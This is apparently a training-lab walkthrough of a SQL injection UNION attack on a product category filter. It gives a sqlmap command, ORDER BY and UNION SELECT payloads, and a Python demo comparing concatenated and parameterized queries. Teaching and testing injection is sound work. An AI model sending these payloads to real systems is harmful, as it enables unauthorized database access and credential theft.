INFO LAB:
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
Goal:
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Solution:
This lab combines techniques from several of the previous labs, so we will try them in turn to reach the goal.
Let’s Hack 👿
sqlmap -u "https://0a450010031d2cdd8057994a00b300cf.web-security-academy.net/filter?category=Gifts"

Here we go: we now know the type of the DB is PostgreSQL.
' ORDER BY 1,2-- > 200 ok
# If we try 1,2,3 we get a 500 Internal Server Error, so we know we have just 2 columns
After that we need to check that we can retrieve data.
' UNION SELECT NULL,NULL-- > We got 200 ok
OK, let's put in any string and see whether it is reflected in the page.
' UNION SELECT NULL,'hacker'--
I notice that the first parameter is not dynamic; it just carries a null value,
so we will get the usernames and passwords in two passes.
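
The column-count and reflection probes above, replayed against a constructed copy of the category filter (an added example, not part of the original write-up or the lab's code). It assumes SQLite in place of the lab's PostgreSQL, and the table contents, function names and 200/500 mapping are made up for illustration; it shows the concatenated query reacting to the probes while the parameterized one treats them as an ordinary category value.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the lab's PostgreSQL.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Mug', 'A mug', 'Gifts');
        INSERT INTO users VALUES ('sample_user', 'sample_password');
    """)
    return db

def filter_vulnerable(db, category):
    # Input is concatenated into the SQL text, so a quote in `category`
    # ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT name, description FROM products "
           "WHERE category = '" + category + "'")
    return db.execute(sql).fetchall()

def filter_parameterized(db, category):
    # Input is bound as a value: it is only ever compared with the column.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

def status(handler, db, category):
    # Mimic the behaviour seen in the write-up: a database error becomes a 500.
    try:
        handler(db, category)
        return 200
    except sqlite3.Error:
        return 500

# The probes from the write-up, appended to the legitimate category value.
PROBES = [
    "Gifts' ORDER BY 1,2--",
    "Gifts' ORDER BY 1,2,3--",
    "Gifts' UNION SELECT NULL,'hacker'--",
]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(probe)
        print("  concatenated :", status(filter_vulnerable, db, probe))
        print("  parameterized:", status(filter_parameterized, db, probe),
              filter_parameterized(db, probe))
```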